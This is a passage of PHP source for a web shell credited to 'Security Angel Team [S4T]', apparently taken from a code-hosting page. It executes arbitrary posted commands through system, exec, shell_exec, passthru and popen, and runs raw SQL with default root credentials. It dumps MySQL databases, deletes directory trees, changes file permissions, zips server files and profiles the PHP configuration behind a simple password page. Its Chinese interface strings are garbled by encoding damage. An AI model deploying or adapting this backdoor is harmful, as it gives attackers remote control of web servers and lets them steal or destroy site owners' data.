passthru($_POST['command']);
} elseif ($execfunc=="exec") {
$result = exec($_POST['command']);
echo $result;
} elseif ($execfunc=="shell_exec") {
$result=shell_exec($_POST['command']);
echo $result;
} elseif ($execfunc=="popen") {
$pp = popen($_POST['command'], 'r');
$read = fread($pp, 2096);
echo $read;
pclose($pp);
} else {
system($_POST['command']);
}
}
?></textarea></td>
</tr>
</form>
</table>
<?php
} else {
?>
<p><b>Safe_Mode <EFBFBD>Ѵ<EFBFBD><EFBFBD><EFBFBD>, <EFBFBD>޷<EFBFBD>ִ<EFBFBD><EFBFBD>ϵͳ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>.</b></p>
<?php
}
}//end shell
elseif ($_GET['action'] == "deldir") {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<form action="?dir=<?=urlencode($dir)?>" method="POST">
<tr class="firstalt">
<td align="center">ɾ<EFBFBD><EFBFBD> <input name="deldir" type="text" value="<?=$deldir?>" class="input" readonly> Ŀ¼</td>
</tr>
<tr class="secondalt">
<td align="center">ע<EFBFBD><EFBFBD>:<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ¼<EFBFBD>ǿ<EFBFBD>,<EFBFBD>˴β<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ɾ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ¼<EFBFBD>µ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>.<EFBFBD><EFBFBD>ȷ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>?</td>
</tr>
<tr class="firstalt">
<td align="center">
<input type="submit" name="rmdir" value="delete" class="input">
</td>
</tr>
</form>
</table>
<?php
}//end deldir
elseif ($_GET['action'] == "fileperm") {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt">
<td align="center"><EFBFBD>޸<EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> [<a href="?dir=<?=urlencode($dir)?>"><EFBFBD><EFBFBD><EFBFBD><EFBFBD></a>]</td>
</tr>
<form action="?dir=<?=urlencode($dir)?>" method="POST">
<tr class="secondalt">
<td align="center"><input name="file" type="text" value="<?=$file?>" class="input" readonly> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ:
<input type="text" name="fileperm" size="20" value="<?=substr(base_convert(fileperms($dir."/".$file),10,8),-4)?>" class="input">
<input name="dir" type="hidden" value="<?=urlencode($dir)?>">
<input type="submit" name="editfileperm" value="modify" class="input"></td>
</tr>
</form>
</table>
<?php
}//end fileperm
elseif ($_GET['action'] == "sql") {
$servername = isset($servername) ? $servername : 'localhost';
$dbusername = isset($dbusername) ? $dbusername : 'root';
$dbpassword = isset($dbpassword) ? $dbpassword : '';
$dbname = isset($dbname) ? $dbname : '';
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt">
<td align="center">ִ<EFBFBD><EFBFBD> SQL <EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
</tr>
<form action="?action=sql" method="POST">
<tr class="secondalt">
<td align="center">Host:
<input name="servername" type="text" class="INPUT" value="<?=$servername?>">
User:
<input name="dbusername" type="text" class="INPUT" size="15" value="<?=$dbusername?>">
Pass:
<input name="dbpassword" type="text" class="INPUT" size="15" value="<?=$dbpassword?>">
DB:
<input name="dbname" type="text" class="INPUT" size="15" value="<?=$dbname?>">
<input name="connect" type="submit" class="INPUT" value="<EFBFBD><EFBFBD><EFBFBD><EFBFBD>"></td>
</tr>
<tr class="firstalt">
<td align="center"><textarea name="sql_query" cols="85" rows="10"></textarea></td>
</tr>
<tr class="secondalt">
<td align="center"><input type="submit" name="doquery" value="ִ<EFBFBD><EFBFBD>" class="input"></td>
</tr>
</form>
</table>
<?php
}//end sql query
elseif ($_GET['action'] == "sqlbak") {
$servername = isset($servername) ? $servername : 'localhost';
$dbusername = isset($dbusername) ? $dbusername : 'root';
$dbpassword = isset($dbpassword) ? $dbpassword : '';
$dbname = isset($dbname) ? $dbname : '';
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt">
<td align="center"><EFBFBD><EFBFBD><EFBFBD><EFBFBD> MySQL <EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD></td>
</tr>
<form action="?action=sqlbak" method="POST">
<tr class="secondalt">
<td align="center">Host:
<input name="servername" type="text" class="INPUT" value="<?=$servername?>">
User:
<input name="dbusername" type="text" class="INPUT" size="15" value="<?=$dbusername?>">
Pass:
<input name="dbpassword" type="text" class="INPUT" size="15" value="<?=$dbpassword?>">
DB:
<input name="dbname" type="text" class="INPUT" size="15" value="<?=$dbname?>">
<input name="connect" type="submit" class="INPUT" value="<EFBFBD><EFBFBD><EFBFBD><EFBFBD>"></td>
</tr>
<?php
@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname);
$tables = @mysql_list_tables($dbname);
while ($table = @mysql_fetch_row($tables)) {
$cachetables[$table[0]] = $table[0];
}
@mysql_free_result($tables);
if (empty($cachetables)) {
echo "<tr>\n";
echo " <td align=\"center\" class=\"firstalt\"><b><3E><>û<EFBFBD><C3BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD> or <20><>ǰ<EFBFBD><C7B0><EFBFBD>ݿ<EFBFBD>û<EFBFBD><C3BB><EFBFBD>κ<EFBFBD><CEBA><EFBFBD><EFBFBD>ݱ<EFBFBD></b></td>\n";
echo "</tr>\n";
} else {
?>
<tr>
<td align="center" class="secondalt"><table border="0" cellpadding="3" cellspacing="1"><tr>
<td valign="top"><EFBFBD><EFBFBD>ѡ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>:</td>
<td><select name="table[]" multiple size="15">
<?php
if (is_array($cachetables)) {
foreach ($cachetables AS $key=>$value) {
echo "<option value=\"$key\">$value</option>\n";
}
}
?>
</select></td>
</tr>
<tr nowrap>
<td><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><EFBFBD>:</td>
<td><input type="text" class="INPUT" name="path" size="50" maxlength="50" value="./<?=$_SERVER['HTTP_HOST']?>_MySQL.sql"></td>
</tr>
</table></td>
</tr>
<tr>
<td align="center" class="firstalt"><input type="submit" name="dobackup" value="<EFBFBD><EFBFBD>ʼ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>" class="INPUT"></td>
</tr>
<?php
}
echo " </form>\n";
echo "</table>\n";
@mysql_close();
}//end sql backup
elseif ($_GET['action'] == "phpenv") {
$upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϴ<EFBFBD>";
$adminmail=(isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
$dis_func = get_cfg_var("disable_functions");
if ($dis_func == "") {
$dis_func = "No";
}else {
$dis_func = str_replace(" ","<br>",$dis_func);
$dis_func = str_replace(",","<br>",$dis_func);
}
$phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
$info[0] = array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><EFBFBD>",date("Y<EFBFBD><EFBFBD>m<EFBFBD><EFBFBD>d<EFBFBD><EFBFBD> h:i:s",time()));
$info[1] = array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>","<a href=\"http://$_SERVER[SERVER_NAME]\" target=\"_blank\">$_SERVER[SERVER_NAME]</a>");
$info[2] = array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>IP<EFBFBD><EFBFBD>ַ",gethostbyname($_SERVER['SERVER_NAME']));
$info[3] = array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϵͳ",PHP_OS);
$info[5] = array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϵͳ<EFBFBD><EFBFBD><EFBFBD>ֱ<EFBFBD><EFBFBD><EFBFBD>",$_SERVER['HTTP_ACCEPT_LANGUAGE']);
$info[6] = array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",$_SERVER['SERVER_SOFTWARE']);
$info[7] = array("Web<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˿<EFBFBD>",$_SERVER['SERVER_PORT']);
$info[8] = array("PHP<EFBFBD><EFBFBD><EFBFBD>з<EFBFBD>ʽ",strtoupper(php_sapi_name()));
$info[9] = array("PHP<EFBFBD>",PHP_VERSION);
$info[10] = array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڰ<EFBFBD>ȫģʽ",getphpcfg("safemode"));
$info[11] = array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ա",$adminmail);
$info[12] = array("<EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>·<EFBFBD><EFBFBD>",__FILE__);
$info[13] = array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʹ<EFBFBD><EFBFBD> URL <20><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD> allow_url_fopen",getphpcfg("allow_url_fopen"));
$info[14] = array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̬<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ӿ<EFBFBD> enable_dl",getphpcfg("enable_dl"));
$info[15] = array("<EFBFBD><EFBFBD>ʾ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ display_errors",getphpcfg("display_errors"));
$info[16] = array("<EFBFBD>Զ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȫ<EFBFBD>ֱ<EFBFBD><EFBFBD><EFBFBD> register_globals",getphpcfg("register_globals"));
$info[17] = array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc"));
$info[18] = array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʹ<EFBFBD><EFBFBD><EFBFBD>ڴ<EFBFBD><EFBFBD><EFBFBD> memory_limit",getphpcfg("memory_limit"));
$info[19] = array("POST<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ֽ<EFBFBD><EFBFBD><EFBFBD> post_max_size",getphpcfg("post_max_size"));
$info[20] = array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϴ<EFBFBD><EFBFBD>ļ<EFBFBD> upload_max_filesize",$upsize);
$info[21] = array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><EFBFBD> max_execution_time",getphpcfg("max_execution_time")."<EFBFBD><EFBFBD>");
$info[22] = array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>õĺ<EFBFBD><EFBFBD><EFBFBD> disable_functions",$dis_func);
$info[23] = array("phpinfo()",$phpinfo);
$info[24] = array("Ŀǰ<EFBFBD><EFBFBD><EFBFBD>п<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ռ<EFBFBD>diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb');
$info[25] = array("ͼ<EFBFBD>δ<EFBFBD><EFBFBD><EFBFBD> GD Library",getfun("imageline"));
$info[26] = array("IMAP<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʼ<EFBFBD>ϵͳ",getfun("imap_close"));
$info[27] = array("MySQL<EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD>",getfun("mysql_close"));
$info[28] = array("SyBase<EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD>",getfun("sybase_close"));
$info[29] = array("Oracle<EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD>",getfun("ora_close"));
$info[30] = array("Oracle 8 <20><><EFBFBD>ݿ<EFBFBD>",getfun("OCILogOff"));
$info[31] = array("PREL<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>﷨ PCRE",getfun("preg_match"));
$info[32] = array("PDF<EFBFBD>ĵ<EFBFBD>֧<EFBFBD><EFBFBD>",getfun("pdf_close"));
$info[33] = array("Postgre SQL<51><4C><EFBFBD>ݿ<EFBFBD>",getfun("pg_close"));
$info[34] = array("SNMP<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Э<EFBFBD><EFBFBD>",getfun("snmpget"));
$info[35] = array("ѹ<EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>֧<EFBFBD><EFBFBD>(Zlib)",getfun("gzclose"));
$info[36] = array("XML<EFBFBD><EFBFBD><EFBFBD><EFBFBD>",getfun("xml_set_object"));
$info[37] = array("FTP",getfun("ftp_login"));
$info[38] = array("ODBC<EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",getfun("odbc_close"));
$info[39] = array("Session֧<EFBFBD><EFBFBD>",getfun("session_start"));
$info[40] = array("Socket֧<EFBFBD><EFBFBD>",getfun("fsockopen"));
?>
<table width="760" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<form action="?action=phpenv" method="POST">
<tr class="firstalt">
<td style="padding-left: 5px;"><b><EFBFBD>鿴PHP<EFBFBD><EFBFBD><EFBFBD>ò<EFBFBD><EFBFBD><EFBFBD>״<EFBFBD><EFBFBD></b></td>
</tr>
<tr class="secondalt">
<td style="padding-left: 5px;"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ò<EFBFBD><EFBFBD><EFBFBD>(<EFBFBD><EFBFBD>:magic_quotes_gpc):<input name="phpvarname" type="text" class="input" size="40"> <input type="submit" name="viewphpvar" value="<EFBFBD>" class="input"></td>
</tr>
</form>
<?php
for($a=0;$a<3;$a++){
if($a == 0){
$hp = array("server","<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>");
}elseif($a == 1){
$hp = array("php","PHP<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>");
}elseif($a == 2){
$hp = array("basic","<EFBFBD><EFBFBD><EFBFBD><EFBFBD>֧<EFBFBD><EFBFBD>״<EFBFBD><EFBFBD>");
}
?>
<tr class="firstalt">
<td style="padding-left: 5px;"><b><?=$hp[1]?></b></td>
</tr>
<tr class="secondalt">
<td>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<?php
if($a == 0){
for($i=0;$i<=12;$i++){
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
}
}elseif($a == 1){
for($i=13;$i<=24;$i++){
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
}
}elseif($a == 2){
for($i=25;$i<=40;$i++){
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
}
}
?>
</table>
</td>
</tr>
<?php
}//for
echo "</table>";
}//end phpenv
?>
<hr width="760" noshade>
<table width="760" border="0" cellpadding="0">
<tr>
<td>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</td>
<td align="right"><?php
debuginfo();
ob_end_flush();
?></td>
</tr>
</table>
</center>
</body>
</html>
<?php
/*======================================================
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
======================================================*/
// <20><>½<EFBFBD><C2BD><EFBFBD><EFBFBD>
function loginpage() {
?>
<style type="text/css">
input {
font-family: "Verdana";
font-size: "11px";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
}
</style>
<form method="POST" action="">
<span style="font-size: 11px; font-family: Verdana">Password: </span><input name="adminpass" type="password" size="20">
<input type="submit" name="login" value="OK">
</form>
<?php
exit;
}//end loginpage()
// ҳ<><D2B3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ
function debuginfo() {
global $starttime;
$mtime = explode(' ', microtime());
$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
echo "Processed in $totaltime second(s)";
}
// ȥ<><C8A5>ת<EFBFBD><D7AA><EFBFBD>ַ<EFBFBD>
function stripslashes_array(&$array) {
while(list($key,$var) = each($array)) {
if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
if (is_string($var)) {
$array[$key] = stripslashes($var);
}
if (is_array($var)) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}
// ɾ<><C9BE>Ŀ¼
function deltree($deldir) {
$mydir=@dir($deldir);
while($file=$mydir->read()) {
if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
@chmod("$deldir/$file",0777);
deltree("$deldir/$file");
}
if (is_file("$deldir/$file")) {
@chmod("$deldir/$file",0777);
@unlink("$deldir/$file");
}
}
$mydir->close();
@chmod("$deldir",0777);
echo @rmdir($deldir) ? "Ŀ¼ɾ<EFBFBD><EFBFBD><EFBFBD>ɹ<EFBFBD>!" : "<font color=\"#ff0000\">Ŀ¼ɾ<C2BC><C9BE>ʧ<EFBFBD><CAA7>!</font>";
}
// <20>ж϶<D0B6>д<EFBFBD><D0B4><EFBFBD><EFBFBD>
function dir_writeable($dir) {
if (!is_dir($dir)) {
@mkdir($dir, 0777);
}
if(is_dir($dir)) {
if ($fp = @fopen("$dir/test.txt", 'w')) {
@fclose($fp);
@unlink("$dir/test.txt");
$writeable = 1;
} else {
$writeable = 0;
}
}
return $writeable;
}
// <20><><EFBFBD><EFBFBD><EFBFBD>м<EFBFBD><D0BC>ı<EFBFBD><C4B1><EFBFBD>ɫ<EFBFBD>
function getrowbg() {
global $bgcounter;
if ($bgcounter++%2==0) {
return "firstalt";
} else {
return "secondalt";
}
}
// <20><>ȡ<EFBFBD><C8A1>ǰ<EFBFBD><C7B0><EFBFBD>ļ<EFBFBD>ϵͳ·<CDB3><C2B7>
function getPath($mainpath, $relativepath) {
global $dir;
$mainpath_info = explode('/', $mainpath);
$relativepath_info = explode('/', $relativepath);
$relativepath_info_count = count($relativepath_info);
for ($i=0; $i<$relativepath_info_count; $i++) {
if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
if ($relativepath_info[$i] == '..') {
$mainpath_info_count = count($mainpath_info);
unset($mainpath_info[$mainpath_info_count-1]);
continue;
}
$mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
} //end for
return implode('/', $mainpath_info);
}
// <20><><EFBFBD><EFBFBD>PHP<48><50><EFBFBD>ò<EFBFBD><C3B2><EFBFBD>
function getphpcfg($varname) {
switch($result = get_cfg_var($varname)) {
case 0:
return No;
break;
case 1:
return Yes;
break;
default:
return $result;
break;
}
}
// <20><><EFBFBD><EFBFBD><E9BAAF><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
function getfun($funName) {
return (false !== function_exists($funName)) ? Yes : No;
}
// ѹ<><D1B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
class PHPZip{
var $out='';
function PHPZip($dir, $zipfilename="") {
if (@function_exists('gzcompress')) {
$curdir = getcwd();
if (is_array($dir)) $filelist = $dir;
else{
$filelist=$this -> GetFileList($dir);//<2F>ļ<EFBFBD><C4BC>б<EFBFBD>
foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
}
if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
else chdir($curdir);
if (count($filelist)>0){
foreach($filelist as $filename){
if (is_file($filename)){
$fd = fopen ($filename, "r");
$content = @fread ($fd, filesize ($filename));
fclose ($fd);
if (is_array($dir)) $filename = basename($filename);
$this -> addFile($content, $filename);
}
}
$this->out = $this -> file();
chdir($curdir);
// <20><><EFBFBD><EFBFBD><E6BDAB><EFBFBD>ɵ<EFBFBD><C9B5><EFBFBD><EFBFBD><EFBFBD>$outд<74><D0B4><EFBFBD>ļ<EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD>ڷ<EFBFBD><DAB7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ѹ<EFBFBD><D1B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȥ<EFBFBD><C8A5>ע<EFBFBD><D7A2>
/*$fp = fopen($zipfilename, "w");
fwrite($fp, $this->out, strlen($this->out));
fclose($fp);
*/
}
return 1;
}
else return 0;
}
// <20><><EFBFBD><EFBFBD>ָ<EFBFBD><D6B8>Ŀ¼<C4BF>ļ<EFBFBD><C4BC>б<EFBFBD>
function GetFileList($dir){
static $a;
if (is_dir($dir)) {
if ($dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if($file!='.' && $file!='..'){
$f=$dir .'/'. $file;
if(is_dir($f)) $this->GetFileList($f);
$a[]=$f;
}
}
closedir($dh);
}
}
return $a;
}
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
} // end if
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
}
function addFile($data, $name, $time = 0) {
$name = str_replace('\\', '/', $name);
$dtime = dechex($this->unix2DosTime($time));
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$c_len = strlen($zdata);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$fr .= pack('v', strlen($name));
$fr .= pack('v', 0);
$fr .= $name;
$fr .= $zdata;
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$this -> datasec[] = $fr;
$new_offset = strlen(implode('', $this->datasec));
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name) );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
$cdrec .= pack('V', $this -> old_offset );
$this -> old_offset = $new_offset;
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function file() {
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);
return
$data .
$ctrldir .
$this -> eof_ctrl_dir .
pack('v', sizeof($this -> ctrl_dir)) .
pack('v', sizeof($this -> ctrl_dir)) .
pack('V', strlen($ctrldir)) .
pack('V', strlen($data)) .
"\x00\x00";
}
}
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD>
function sqldumptable($table, $fp=0) {
$tabledump = "DROP TABLE IF EXISTS $table;\n";
$tabledump .= "CREATE TABLE $table (\n";
$firstfield=1;
$fields = mysql_query("SHOW FIELDS FROM $table");
while ($field = mysql_fetch_array($fields)) {
if (!$firstfield) {
$tabledump .= ",\n";
} else {
$firstfield=0;
}
$tabledump .= " $field[Field] $field[Type]";
if (!empty($field["Default"])) {
$tabledump .= " DEFAULT '$field[Default]'";
}
if ($field['Null'] != "YES") {
$tabledump .= " NOT NULL";
}
if ($field['Extra'] != "") {
$tabledump .= " $field[Extra]";
}
}
mysql_free_result($fields);
$keys = mysql_query("SHOW KEYS FROM $table");
while ($key = mysql_fetch_array($keys)) {
$kname=$key['Key_name'];
if ($kname != "PRIMARY" and $key['Non_unique'] == 0) {
$kname="UNIQUE|$kname";
}
if(!is_array($index[$kname])) {
$index[$kname] = array();
}
$index[$kname][] = $key['Column_name'];
}
mysql_free_result($keys);
while(list($kname, $columns) = @each($index)) {
$tabledump .= ",\n";
$colnames=implode($columns,",");
if ($kname == "PRIMARY") {
$tabledump .= " PRIMARY KEY ($colnames)";
} else {
if (substr($kname,0,6) == "UNIQUE") {
$kname=substr($kname,7);
}
$tabledump .= " KEY $kname ($colnames)";
}
}
$tabledump .= "\n);\n\n";
if ($fp) {
fwrite($fp,$tabledump);
} else {
echo $tabledump;
}
$rows = mysql_query("SELECT * FROM $table");
$numfields = mysql_num_fields($rows);
while ($row = mysql_fetch_array($rows)) {
$tabledump = "INSERT INTO $table VALUES(";
$fieldcounter=-1;
$firstfield=1;
while (++$fieldcounter<$numfields) {
if (!$firstfield) {
$tabledump.=", ";
} else {
$firstfield=0;
}
if (!isset($row[$fieldcounter])) {
$tabledump .= "NULL";
} else {
$tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
}
}
$tabledump .= ");\n";
if ($fp) {
fwrite($fp,$tabledump);
} else {
echo $tabledump;
}
}
mysql_free_result($rows);
}
?>
Reference in a new issue Copy permalink